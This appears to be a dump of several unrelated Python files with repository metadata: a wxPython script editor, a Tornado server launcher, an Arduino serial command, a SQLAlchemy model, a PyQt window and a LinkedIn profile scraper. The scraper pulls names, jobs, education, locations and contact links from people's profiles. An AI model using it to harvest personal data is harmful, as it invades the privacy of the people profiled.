        # Index of the script currently shown; -1 means none open yet.
        self.ScriptIndex = -1
        if index >= 0:
            self.OpenScript(index=index)
        self.scriptCtrl.Bind(
            wx.EVT_KEY_DOWN, kernel.Protect(self.RefreshStatus))
        self.scriptCtrl.Bind(stc.EVT_STC_UPDATEUI, self.RefreshStatus)
        self.comboBoxScripts.AppendItems(
            [script.GetName() for script in Scripts])
        self.comboBoxScripts.SetSelection(index)
        self.scriptCtrl.CalculateLineNumberMargin()
        # Bind the panel to the Panel Manager
        self.bindPanelManager()

    def OpenScript(self, event=None, index=None):
        """Persist the current script's text, then load the script chosen
        either from the combo box (event) or by explicit index."""
        # Save edits of the script we are leaving.
        if self.ScriptIndex >= 0:
            Scripts[self.ScriptIndex].SetText(self.scriptCtrl.GetText())
        if event is not None:
            i = event.GetInt()
        elif index is not None:
            i = index
        else:
            return
        self.ScriptIndex = i
        self.scriptCtrl.SetText(Scripts[i].GetText())
        self.RefreshScript()

    def CreateToolBar(self):
        """Creates the toolbar and binds events to it"""
        art = wx.ArtProvider().GetBitmap
        # Tool ids 0-12 are matched by the Bind calls at the bottom.
        self.toolBar.AddSimpleTool(
            0, art(wx.ART_COPY), 'Copy', 'Copies the selected text')
        self.toolBar.AddSimpleTool(
            1, art(wx.ART_CUT), 'Cut', 'Cuts the selected text')
        self.toolBar.AddSimpleTool(
            2, art(wx.ART_PASTE), 'Paste', 'Pastes previously copied/cut text')
        self.toolBar.AddSeparator()
        self.toolBar.AddSimpleTool(
            3, art(wx.ART_UNDO), 'Undo', 'Undoes the previous action')
        self.toolBar.AddSimpleTool(
            4, art(wx.ART_REDO), 'Redo', 'Redoes the previous Undo')
        self.toolBar.AddSeparator()
        self.toolBar.AddSimpleTool(
            5, art(wx.ART_FIND), 'Find', 'Opens Find window for searching text')
        self.toolBar.AddSimpleTool(6, art(
            wx.ART_FIND_AND_REPLACE), 'Find and Replace', 'Open Find & Replace window for replacing text')
        self.toolBar.AddSeparator()
        self.toolBar.AddSimpleTool(
            7, art(wx.ART_HELP_SETTINGS), 'Settings', 'Opens the settings window')
        self.toolBar.AddSimpleTool(8, art(
            wx.ART_LIST_VIEW), 'Normalize Indents', 'Applies conventional Ruby indenting to the script')
        self.toolBar.AddSimpleTool(
            9, art(wx.ART_HELP_BOOK), 'Help', 'Opens the compiled HTML help doc')
        self.toolBar.AddSeparator()
        # Quick-search text box with previous/next buttons.
        self.textCtrlSearch = wx.TextCtrl(
            self.toolBar, -1, 'Search...', style=wx.TE_RIGHT)
        self.toolBar.AddControl(self.textCtrlSearch)
        self.toolBar.AddSimpleTool(10, art(wx.ART_GO_BACK), 'Previous', '')
        self.toolBar.AddSimpleTool(11, art(wx.ART_GO_FORWARD), 'Next', '')
        self.toolBar.AddSeparator()
        # Script chooser; selection and rename events are handled below.
        self.comboBoxScripts = wx.ComboBox(
            self.toolBar, size=(184, -1), style=wx.GROW)
        self.comboBoxScripts.Bind(wx.EVT_COMBOBOX, self.OpenScript)
        self.comboBoxScripts.Bind(
            wx.EVT_TEXT, self.comboBoxScripts_TextChanged)
        self.toolBar.AddControl(self.comboBoxScripts)
        self.toolBar.AddSeparator()
        self.toolBar.AddSimpleTool(
            12, art(wx.ART_FILE_SAVE), 'Save', 'Saves the current script')
        self.toolBar.Realize()
        self.Bind(wx.EVT_TOOL, self.OnCopy, id=0)
        self.Bind(wx.EVT_TOOL, self.OnCut, id=1)
        self.Bind(wx.EVT_TOOL, self.OnPaste, id=2)
        self.Bind(wx.EVT_TOOL, self.OnUndo, id=3)
        self.Bind(wx.EVT_TOOL, self.OnRedo, id=4)
        self.Bind(wx.EVT_TOOL, self.OnFind, id=5)
        self.Bind(wx.EVT_TOOL, self.OnReplace, id=6)
        self.Bind(wx.EVT_TOOL, kernel.Protect(self.OnSettings), id=7)
        self.Bind(wx.EVT_TOOL, kernel.Protect(self.OnNormalize), id=8)
        self.Bind(wx.EVT_TOOL, kernel.Protect(self.OnHelp), id=9)
        self.Bind(wx.EVT_TOOL, kernel.Protect(self.FindPrevious), id=10)
        self.Bind(wx.EVT_TOOL, kernel.Protect(self.FindNext), id=11)
        self.Bind(wx.EVT_TOOL, kernel.Protect(self.OnSave), id=12)

    def RefreshScript(self):
        """Refreshes the displayed text"""
        self.scriptCtrl.CalculateLineNumberMargin()
        self.RefreshStatus()

    def RefreshStatus(self, event=None):
        """Refreshes the status bar text"""
        # Character count excludes whitespace.
        chars = len(re.sub(r'\s', '', self.scriptCtrl.Text))
        length = str.format('Lines: {0} Characters: {1} Position: {2}',
                            self.scriptCtrl.LineCount, chars, self.scriptCtrl.GetCurrentPos())
        self.statusBar.SetStatusText(length, 1)
        sel = len(self.scriptCtrl.SelectedText)
        if sel > 0:
            self.statusBar.SetStatusText(str.format('Selection: {}', sel), 2)
        else:
            self.statusBar.SetStatusText('', 2)
        if event is not None:
            event.Skip()
        # update text
        if self.ScriptIndex > -1:
            Scripts[self.ScriptIndex].SetText(self.scriptCtrl.GetTextUTF8())

    def OnCopy(self, event):
        """Sets the scripts selected text to the clipboard"""
        self.statusBar.SetStatusText('Copied selected text', 0)
        self.scriptCtrl.Copy()

    def OnCut(self, event):
        """Sets the scripts selected text to the clipboard"""
        self.statusBar.SetStatusText('Cut selected text', 0)
        self.scriptCtrl.Cut()

    def OnPaste(self, event):
        """Pastes the clipboard text to the script"""
        self.statusBar.SetStatusText('Text pasted', 0)
        self.scriptCtrl.Paste()

    def OnUndo(self, event):
        """Performs script Undo action"""
        self.statusBar.SetStatusText('Undo applied', 0)
        self.scriptCtrl.Undo()

    def OnRedo(self, event):
        """Performs script Redo action"""
        self.statusBar.SetStatusText('Redo applied', 0)
        self.scriptCtrl.Redo()

    def OnFind(self, event):
        """Opens FindReplace window with Find tab focused"""
        self.scriptCtrl.StartFindReplace(0)

    def OnReplace(self, event):
        """Opens FindReplace window with Replace tab focused"""
        self.scriptCtrl.StartFindReplace(1)

    def OnSettings(self, event):
        """Show the settings dialog and, on OK, write the new values into
        the 'ScriptEditor' config section and re-apply them."""
        dlg = ScriptSettings_Dialog(self, self.scriptCtrl)
        if dlg.ShowModal() == wx.ID_OK:
            config = kernel.GlobalObjects.get_value(
                'Welder_config').get_section('ScriptEditor')
            new_config = dlg.GetConfiguration()
            for key, value in new_config.items():
                config.set(key, value)
            SM.ApplyUserSettings(self.scriptCtrl)

    def OnNormalize(self, event):
        """Applies script indent normalization"""
        result = wx.MessageBox('Automatically apply conventional Ruby indents to document?',
                               'Confirm Action', wx.OK | wx.CANCEL | wx.CENTRE, self)
        if result == wx.OK:
            import time
            start = time.time()
            self.scriptCtrl.NormalizeIndenting()
            msg = str.format(
                'Indentation applied in {} seconds', time.time() - start)
            self.statusBar.SetStatusText(msg, 0)

    def OnHelp(self, event):
        # NOTE(review): currently only updates the status text and prints
        # the script's modified flag — no help viewer is opened yet.
        self.statusBar.SetStatusText('Opening Help...', 0)
        print(Scripts[self.ScriptIndex].IsModified())

    def OnSave(self, event):
        """Saves the open script to disk"""
        if self.ScriptIndex >= 0:
            Scripts[self.ScriptIndex].SetText(self.scriptCtrl.GetText())
            Scripts[self.ScriptIndex].SaveScript(self.ScriptIndex)
            msg = str.format(
                '{}.rb Saved!', Scripts[self.ScriptIndex].GetName())
            self.statusBar.SetStatusText(msg, 0)

    def comboBoxScripts_TextChanged(self, event):
        # Typing in the combo box renames the current script and keeps the
        # drop-down entry in sync.
        text = event.GetString()
        Scripts[self.ScriptIndex].ChangeName(text)
        self.comboBoxScripts.SetString(self.ScriptIndex, text)
        self.comboBoxScripts.SetStringSelection(text)

    # --------------------------------------------------------------
    # Find/Replace Functions
    # --------------------------------------------------------------

    def GetSearchLocations(self, searchString, matchcase, wholeword, scope, regex=None):
        """Map script index -> list of line numbers containing searchString.

        NOTE(review): the implementation is entirely commented out, so this
        currently always returns an empty dict.
        """
        results = {}
        # if scope == 0:
        #     scripts = [Scripts[self.listBoxScripts.GetSelection()]]
        # else:
        #     scripts = Scripts
        # if not matchcase:
        #     searchString = searchString.lower()
        # for i, script in enumerate(scripts):
        #     if not matchcase: text = script.GetText().lower()
        #     else: text = script.GetText()
        #     if searchString in text:
        #         lines, found = text.splitlines(), []
        #         for j in xrange(len(lines)):
        #             if searchString in lines[j] and j not in found:
        #                 found.append(j)
        #         results[i] = found
        return results

    def FindPrevious(self, event):
        # NOTE(review): the search pattern 'Tro.p' is hard-coded (debug
        # leftover?) — the text typed into textCtrlSearch is never used.
        result = self.scriptCtrl.Find('Tro.p', True, False, True, False, True)
        return result

    def FindNext(self, event):
        # NOTE(review): same hard-coded 'Tro.p' pattern as FindPrevious.
        result = self.scriptCtrl.Find('Tro.p', True, False, True, False, False)
        return result
| [
"ryexander@gmail.com"
] | ryexander@gmail.com |
f819671abf5f9bd7beeb31f17f6f1cadd1e481c9 | 13a89d514738db263aab7952fbc4d827e84cdc63 | /tornado_server.py | 5e47ee975b0fcfa45cb3c81c0252210714806197 | [] | no_license | kejukeji/pub_py | f94f8acdf7703f1f5a1d4a95d3da8c7475759829 | 619690547f1c8ba1a326c22c070577093512ec87 | refs/heads/master | 2020-04-06T06:59:47.149855 | 2014-01-21T11:19:04 | 2014-01-21T11:19:10 | 13,577,587 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | # coding: utf-8
from pub_app import app
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(7071) # flask默认的端口,可任意修改
IOLoop.instance().start() | [
"exthen@gmail.com"
] | exthen@gmail.com |
432833db9cf0ca962085ecf6c3b5689183f149a1 | 031aa63c4d807d828a916ad09d60dc4bd855e201 | /Cod sursa/Cod_Raspberry_Pi/www/arduino/led_motor3_off.py | 51c1ad6611bb467cd18c67d5367ab3573e8284c8 | [] | no_license | alexantighin/Smart-Vending-Machine | 5fbc5661d83830aab16fa035e6634235032ad1cf | 8b4fc0905c19b4fc1ded5a7fa0abbc7d7757406e | refs/heads/main | 2023-02-18T17:49:22.256507 | 2021-01-21T23:03:40 | 2021-01-21T23:03:40 | 331,774,251 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | #!/user/bin/env python
import serial
port= "/dev/ttyUSB0"
Arduino_UNO = serial.Serial(port,baudrate=9600)
Arduino_UNO.write('led_motor3_off')
| [
"noreply@github.com"
] | noreply@github.com |
8667dc804bc863ecbd252923a7c0a0bb5bd6e785 | c4f13f49c55084cf0680f48529d73ed8b4cc4dd3 | /metrics/__init__.py | cc2dd4cb5277f118c9d6b840fdafdafa120e4f61 | [] | no_license | shilad/cartograph-server | 69629f87fad1161c3cae852c86bed22ed451cb91 | a59e580768760453d62833c71f1178de98dbbbba | refs/heads/master | 2021-05-18T17:41:15.031374 | 2020-08-03T19:03:14 | 2020-08-03T19:03:14 | 251,341,602 | 1 | 0 | null | 2020-07-15T05:20:55 | 2020-03-30T15:08:12 | HTML | UTF-8 | Python | false | false | 545 | py | from metrics.DivergingMetric import DivergingMetric
from metrics.SequentialMetric import SequentialMetric
from metrics.QualitativeMetric import QualitativeMetric
def getMetric(js):
args = dict(js)
del args['type']
del args['path']
mType = js['type']
if mType == 'sequential':
return SequentialMetric(**args)
elif mType == 'diverging':
return DivergingMetric(**args)
elif mType == 'qualitative':
return QualitativeMetric(**args)
else:
raise Exception, 'unknown type %s' % `mType` | [
"ypang@macalester.edu"
] | ypang@macalester.edu |
6c9f457dd03976df5e0f09804e8679cfce387513 | be0069d3acb9c151eec77e1d127645a3b193cdae | /try-except1.py | 664f6b7dd0bbfab9c70c3892199625612f403528 | [] | no_license | muhidham17/Penanganan-Eksepsi | d60d4930a030a5d9b3069952acd07a9446d48158 | 477def9f6d691e08bde6c7f3526b0a0ab0089f1d | refs/heads/master | 2020-08-07T19:37:44.417555 | 2019-10-08T07:49:00 | 2019-10-08T07:49:00 | 213,567,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | import sys
def main():
print ("Program Pembagian Bilangan")
a = float (input("Masukkan a: "))
b = float (input("Masukkan b: "))
try:
hasil = a / b
except ZeroDivisionError:
print ("\nError: Nilai b tidak boleh nol")
sys.exit(1)
print ("\na : ", a)
print ("b : ", b)
print ("a / b = ", hasil)
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | noreply@github.com |
2f7c9d26fcc2bf586f983f5a458750c3f69184e8 | 5cf1b1e9cefde910acb8309fc7c9abf04eff5bc0 | /view/welcome_page2.py | e543a8cbe619cbbf789f40c28d6f70e846f6b4be | [] | no_license | adika3121/Network-Learning-Application-with-Packet-Sniffer | 64f4bd151b222608b0db3fc156fd3b93692bca8f | 2dd89b365d3c03aed1c80bc78bc788a7ed352130 | refs/heads/master | 2022-11-27T05:51:57.879444 | 2020-07-29T14:03:55 | 2020-07-29T14:03:55 | 283,414,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,044 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'welcome_page2.ui'
#
# Created by: PyQt5 UI code generator 5.13.0
#
# WARNING! All changes made in this file will be lost!
import self
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QPushButton, QGraphicsDropShadowEffect, QWidget, QMainWindow, QApplication
from view.hasil_sniffing2 import Ui_hasil_sniffing2
from view.input_sniffing import Ui_sniffing_langsung
from view.pilih_method2 import Ui_LaluLintas_type2
class Ui_mainWindow(object):
def setupUi(self, mainWindow):
mainWindow.setObjectName("mainWindow")
qss_file = open('../resource/style.qss').read()
mainWindow.resize(800, 600)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(mainWindow.sizePolicy().hasHeightForWidth())
mainWindow.setSizePolicy(sizePolicy)
mainWindow.setStyleSheet(qss_file)
mainWindow.setAnimated(True)
self.centralwidget = QtWidgets.QWidget(mainWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setContentsMargins(20, -1, 20, -1)
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
self.verticalLayout_2.setContentsMargins(20, -1, 20, -1)
self.verticalLayout_2.setSpacing(6)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label = QtWidgets.QLabel(self.centralwidget)
# self.label.setGraphicsEffect(self.shadow)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setMinimumSize(QtCore.QSize(0, 100))
self.label.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(18)
font.setFamily("Lato")
font.setBold(True)
self.label.setFont(font)
self.label.setFrameShadow(QtWidgets.QFrame.Plain)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout_2.addWidget(self.label)
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setContentsMargins(10, -1, -1, -1)
self.gridLayout_2.setObjectName("gridLayout_2")
# About Button
self.aboutBtn = QtWidgets.QPushButton(self.centralwidget)
self.aboutBtn.setMinimumSize(QtCore.QSize(0, 50))
# self.aboutBtn.setGraphicsEffect(self.shadow)
font = QtGui.QFont()
font.setFamily("Century")
font.setPointSize(-1)
self.aboutBtn.setFont(font)
self.aboutBtn.setStyleSheet(qss_file)
self.aboutBtn.setObjectName("aboutBtn")
self.gridLayout_2.addWidget(self.aboutBtn, 3, 0, 1, 1)
self.glosariumBtn = QtWidgets.QPushButton(self.centralwidget)
self.glosariumBtn.setMinimumSize(QtCore.QSize(0, 50))
font = QtGui.QFont()
font.setFamily("Century")
font.setPointSize(-1)
self.glosariumBtn.setFont(font)
self.glosariumBtn.setStyleSheet(qss_file)
self.glosariumBtn.setObjectName("glosariumBtn")
self.gridLayout_2.addWidget(self.glosariumBtn, 2, 0, 1, 1)
self.quizBtn = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.quizBtn.sizePolicy().hasHeightForWidth())
self.quizBtn.setSizePolicy(sizePolicy)
self.quizBtn.setMinimumSize(QtCore.QSize(0, 50))
font = QtGui.QFont()
font.setFamily("Century")
font.setPointSize(-1)
self.quizBtn.setFont(font)
self.quizBtn.setStyleSheet(qss_file)
self.quizBtn.setObjectName("quizBtn")
self.gridLayout_2.addWidget(self.quizBtn, 1, 0, 1, 1)
self.lihat_protocolBtn = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lihat_protocolBtn.sizePolicy().hasHeightForWidth())
self.lihat_protocolBtn.setSizePolicy(sizePolicy)
self.lihat_protocolBtn.setMinimumSize(QtCore.QSize(20, 50))
font = QtGui.QFont()
font.setFamily("Century")
font.setPointSize(-1)
self.lihat_protocolBtn.setFont(font)
self.lihat_protocolBtn.setStyleSheet(qss_file)
self.lihat_protocolBtn.setAutoDefault(False)
self.lihat_protocolBtn.setDefault(False)
self.lihat_protocolBtn.setFlat(False)
self.lihat_protocolBtn.setObjectName("lihat_protocolBtn")
self.gridLayout_2.addWidget(self.lihat_protocolBtn, 0, 0, 1, 1)
self.verticalLayout_2.addLayout(self.gridLayout_2)
self.horizontalLayout.addLayout(self.verticalLayout_2)
mainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(mainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))
self.menubar.setObjectName("menubar")
mainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(mainWindow)
self.statusbar.setObjectName("statusbar")
mainWindow.setStatusBar(self.statusbar)
self.retranslateUi(mainWindow)
QtCore.QMetaObject.connectSlotsByName(mainWindow)
def retranslateUi(self, mainWindow):
_translate = QtCore.QCoreApplication.translate
mainWindow.setWindowTitle(_translate("mainWindow", "Aplikasi Pembelajaran Lalu Lintas Protokol"))
self.label.setText(_translate("mainWindow", "Aplikasi Pembelajaran Lalu Lintas Protokol"))
self.aboutBtn.setText(_translate("mainWindow", "Tentang Aplikasi"))
self.glosariumBtn.setText(_translate("mainWindow", "Glosarium"))
self.quizBtn.setText(_translate("mainWindow", "Kuis"))
self.lihat_protocolBtn.setText(_translate("mainWindow", "Lihat Lalu Lintas Protokol"))
# if __name__ == "__main__":
# import sys
# app = QtWidgets.QApplication(sys.argv)
# # mainWindow = QtWidgets.QMainWindow()
# # app = QApplication(sys.argv)
# w = MainWindow()
# sys.exit(app.exec_())
# # ui = MainWindow()
# # ui.setupUi(mainWindow)
# # mainWindow.show()
# # sys.exit(app.exec_())
| [
"adikadarmesta8@gmail.com"
] | adikadarmesta8@gmail.com |
3f9379943d8445f0a65b38ee633c6c1d526a46e9 | c5c6e54a9f3139f1df2e5896fc0c8b1c05a0b0e3 | /category/models.py | f7caa045cfd4cbf23636a3d22553d8ec5ddccdbf | [] | no_license | npwaters/item-catalog-web-application | 03ba146712b26bfe248b036eaa67eaaf5c4bd072 | d358bd1f59b31f706bab61289ddc38927862256f | refs/heads/master | 2022-12-10T00:39:44.873106 | 2019-12-09T05:51:06 | 2019-12-09T05:51:06 | 222,643,120 | 1 | 0 | null | 2022-12-08T06:54:27 | 2019-11-19T08:12:06 | Python | UTF-8 | Python | false | false | 537 | py | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.orm import relationship
from app import Base
from user.models import User
class Category(Base):
__tablename__ = "category"
id = Column(Integer, primary_key=True)
name = Column(String(80), nullable=False)
user_id = Column(Integer, ForeignKey("user.id"))
user = relationship(User)
@property
def serialize(self):
return {
"id": self.id,
"name": self.name,
"user_id": self.user_id
}
| [
"40352015+npwaters@users.noreply.github.com"
] | 40352015+npwaters@users.noreply.github.com |
3ec60458eceee57fc72037f687c461ce3fa0b78e | 7de6ddf76a60519dacde732a546c24dff536f51a | /Linkedin_crawler/profile_html_handler.py | 4360708ee8788d3a5380cb311a755344baf21f0a | [] | no_license | J-Pascual-Rocamora/Linkedin_crawler | 08c1923099ee32d1ad6ee3728a01050568b33457 | 58b0ab23953bb66b0a5878db669a53dfef571d2d | refs/heads/master | 2021-05-10T08:25:06.356575 | 2018-01-25T17:17:37 | 2018-01-25T17:17:37 | 118,890,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65,917 | py | # -*- coding: UTF-8 -*-
import os
import re
from bs4 import BeautifulSoup
def get_top_card(web_html):
    '''Extract the profile header ("top card") fields from a LinkedIn profile page.

    Parameters
    ----------
    web_html : bs4.BeautifulSoup
        Parsed html of a LinkedIn profile.

    Returns
    -------
    list
        [0] : Name
        [1] : Distance on network ('Not in network' when absent)
        [2] : Current position
        [3] : Current company
        [4] : Last company
        [5] : Last education
        [6] : Location
        [7] : Number of connections
        [8] : Summary

        Missing fields come back as empty strings instead of raising.
    '''
    # Defaults keep every slot defined even when a sub-element is missing
    # (the previous version raised NameError when the 'dist-value' span
    # was absent, and crashed when the whole top-card section was missing).
    name_text = ''
    distance_text = ''
    current_position = ''
    current_company = ''
    last_company_text = ''
    last_education_text = ''
    location_text = ''
    connections_text = ''
    summary_text = ''

    top_card_section = web_html.find('section', attrs={'class': 'pv-profile-section pv-top-card-section artdeco-container-card ember-view'})
    if top_card_section:
        # Get the name
        name_html = web_html.find('h1', attrs={'class': 'pv-top-card-section__name Sans-26px-black-85%'})
        if name_html:
            name_text = name_html.text.strip()
        else:
            # Diagnostic aid: LinkedIn renames classes often, so dump candidates.
            print ('ERROR: No name_section not found')
            print ('Other labels found:')
            for candidate in top_card_section.find_all('h1'):
                try:
                    print ('\t' + str(candidate['class']))
                except Exception:
                    pass

        # Get distance value (network distance, e.g. '1st', '2nd')
        distance_html = top_card_section.find('span', attrs={'class': 'dist-value'})
        if distance_html:
            distance_text = distance_html.text.strip()

        # Get current employment line, just below the name;
        # usually formatted as '<position> at <company>'.
        current_ocupation_html = top_card_section.find('h2', attrs={'class': 'pv-top-card-section__headline Sans-19px-black-85%'})
        if current_ocupation_html:
            current_broken = current_ocupation_html.text.strip().split(' at ')
            current_position = current_broken[0]
            if len(current_broken) > 1:
                current_company = current_broken[1]

        # Get last company
        last_company_html = top_card_section.find('h3', attrs={'class': 'pv-top-card-section__company Sans-17px-black-70% mb1 inline-block'})
        if last_company_html:
            last_company_text = last_company_html.text.strip()

        # Get last education
        last_education_html = top_card_section.find('h3', attrs={'class': 'pv-top-card-section__school pv-top-card-section__school--with-separator Sans-17px-black-70% mb1 inline-block'})
        if last_education_html:
            last_education_text = last_education_html.text.strip()

        # Get current location
        location_html = top_card_section.find('h3', attrs={'class': 'pv-top-card-section__location Sans-17px-black-70% mb1 inline-block'})
        if location_html:
            location_text = location_html.text.strip()

        # Get number of connections (text lives in a nested span)
        connections_html = top_card_section.find('h3', attrs={'class': 'pv-top-card-section__connections pv-top-card-section__connections--with-separator Sans-17px-black-70% mb1 inline-block'})
        if connections_html:
            connections_span = connections_html.find('span')
            if connections_span:
                connections_text = connections_span.text.strip()

    if not distance_text:
        distance_text = 'Not in network'

    # The summary paragraph lives outside the top-card section.
    summary_html = web_html.find('p', attrs={'class': 'pv-top-card-section__summary-text text-align-left Sans-15px-black-55% mt5 pt5 ember-view'})
    if summary_html:
        summary_text = summary_html.text.strip()

    return [name_text, distance_text, current_position, current_company,
            last_company_text, last_education_text, location_text,
            connections_text, summary_text]
def get_other_links(web_html):
    '''Return every href shown in the contact-info card of a LinkedIn profile.

    Parameters
    ----------
    web_html : bs4.BeautifulSoup
        Parsed html of a LinkedIn profile.

    Returns
    -------
    list
        All the links (href values) shown in the contact personal
        information card; empty when the card is not present.
    '''
    links_pool = []
    contact_info_block = web_html.find('section', attrs={'class': 'pv-profile-section pv-contact-info artdeco-container-card ember-view'})
    if contact_info_block:
        for link in contact_info_block.find_all('a', href=True):
            links_pool.append(link['href'])
    else:
        # Diagnostic aid: LinkedIn renames classes often, so dump candidates.
        print ('ERROR: No other links section found')
        print ('Other sections found:')
        # Fixed: was 'fin_all', which raised AttributeError here.
        for sec in web_html.find_all('section'):
            try:
                print ('\t' + str(sec['class']))
            except Exception:
                pass
    return links_pool
def get_jobs(web_html):
    '''Extract the experience section from a LinkedIn profile page.

    Parameters
    ----------
    web_html : bs4.BeautifulSoup
        Parsed html of a LinkedIn profile.

    Returns
    -------
    list
        [0] : Position titles
        [1] : Companies at which the candidate has worked
        [2] : Dates, start and end time of each position
        [3] : Time spent at each position
        [4] : Locations at which each position was developed
        [5] : Resumes of the positions

        Each entry is a list with one element per position; all six lists
        are empty when no experience data is found.
    '''
    positions = []
    companies = []
    dates = []
    time_spent = []
    locations = []
    resumes = []

    def _clean(tag, prefix=''):
        # Text of a tag with an optional screen-reader prefix removed;
        # '' when the tag was not found.
        if not tag:
            return ''
        text = tag.text.strip()
        return text.replace(prefix, '') if prefix else text

    # The list markup varies between profiles; a list as the class filter
    # makes BeautifulSoup accept any of the known variants in one find().
    ul_class_pool = ['pv-profile-section__section-info section-info pv-profile-section__section-info--has-more',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-more ember-view',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more ember-view',]

    experience_block = None
    experience_section = web_html.find('section', attrs={'class': 'pv-profile-section experience-section ember-view'})
    if experience_section:
        experience_block = experience_section.find('ul', attrs={'class': ul_class_pool})
        if not experience_block:
            # Diagnostic aid: LinkedIn renames classes often, so dump candidates.
            print ('ERROR: No experience_block found.')
            print ('Others uls found:')
            for candidate in experience_section.find_all('ul'):
                try:
                    print ('\t' + str(candidate['class']))
                except Exception:
                    pass

    # Guarded: the previous version iterated experience_block.children
    # unconditionally and crashed with AttributeError when it was None.
    if experience_block:
        for child in experience_block.children:
            if len(child) > 1:
                # Re-parse the item so find() is scoped to this position only
                job = BeautifulSoup(str(child), 'html.parser')
                positions.append(_clean(job.find('h3')))
                companies.append(_clean(job.find('h4', attrs={'class': 'Sans-17px-black-85%'}), 'Company Name\n'))
                dates.append(_clean(job.find('h4', attrs={'class': 'pv-entity__date-range inline-block Sans-15px-black-70%'}), 'Dates Employed\n'))
                time_spent.append(_clean(job.find('h4', attrs={'class': 'inline-block Sans-15px-black-70%'}), 'Employment Duration\n'))
                locations.append(_clean(job.find('h4', attrs={'class': 'pv-entity__location Sans-15px-black-70% block'}), 'Location\n'))
                resumes.append(_clean(job.find('div', attrs={'class': 'pv-entity__extra-details'})))

    return [positions, companies, dates, time_spent, locations, resumes]
def get_education(web_html):
    '''Extract the education section from a LinkedIn profile page.

    Parameters
    ----------
    web_html : bs4.BeautifulSoup
        Parsed html of a LinkedIn profile.

    Returns
    -------
    list
        [0] : Institutions at which the studies have been developed
        [1] : Degree titles
        [2] : Fields of study
        [3] : Dates of studies
        [4] : Others (activities and societies, etc.)
        [5] : Resumes (free-text information about the education)

        When the education section is missing entirely, every list
        contains the single placeholder entry 'NULL'.
    '''
    institutions = []
    degrees = []
    fields = []
    dates = []
    others = []
    resumes = []

    # Known class-name variants of the education list container;
    # passing the whole list lets find() match any of them.
    ul_class_pool = ['pv-profile-section__section-info section-info pv-profile-section__section-info--has-more',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-more ember-view',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more',
                     'pv-profile-section__section-info section-info pv-profile-section__section-info--has-no-more ember-view',]

    education_section = web_html.find('section', attrs={'class': 'pv-profile-section education-section ember-view'})
    if education_section:
        education_block = education_section.find('ul', attrs={'class': ul_class_pool})
        if not education_block:
            # Diagnostic output to spot renamed class labels.
            print ('ERROR: no education_block found')
            print ('Others uls found:')
            for candidate in education_section.find_all('ul'):
                try:
                    print ('\t' + str(candidate['class']))
                except:
                    pass
        else:
            for child in education_block.children:
                if len(child) > 1:
                    # Re-parse the item so lookups stay scoped to one entry
                    edu = BeautifulSoup(str(child), 'html.parser')

                    node = edu.find('h3')
                    institutions.append(node.text.strip() if node else '')

                    node = edu.find('p', attrs={'class': 'pv-entity__secondary-title pv-entity__degree-name pv-entity__secondary-title Sans-15px-black-85%'})
                    degrees.append(node.text.strip().replace('Degree Name\n', '') if node else '')

                    node = edu.find('p', attrs={'class': 'pv-entity__secondary-title pv-entity__fos pv-entity__secondary-title Sans-15px-black-70%'})
                    fields.append(node.text.strip().replace('Field Of Study\n', '') if node else '')

                    node = edu.find('p', attrs={'class': 'pv-entity__dates Sans-15px-black-70%'})
                    dates.append(node.text.strip().replace('Dates attended or expected graduation\n\n', '') if node else '')

                    node = edu.find('p', attrs={'class': 'pv-entity__secondary-title Sans-15px-black-70%'})
                    others.append(node.text.strip().replace('Activities and Societies:\n', '') if node else '')

                    node = edu.find('div', attrs={'class': 'pv-entity__extra-details'})
                    resumes.append(node.text.strip() if node else '')
    else:
        # No education section at all: pad every field with a placeholder.
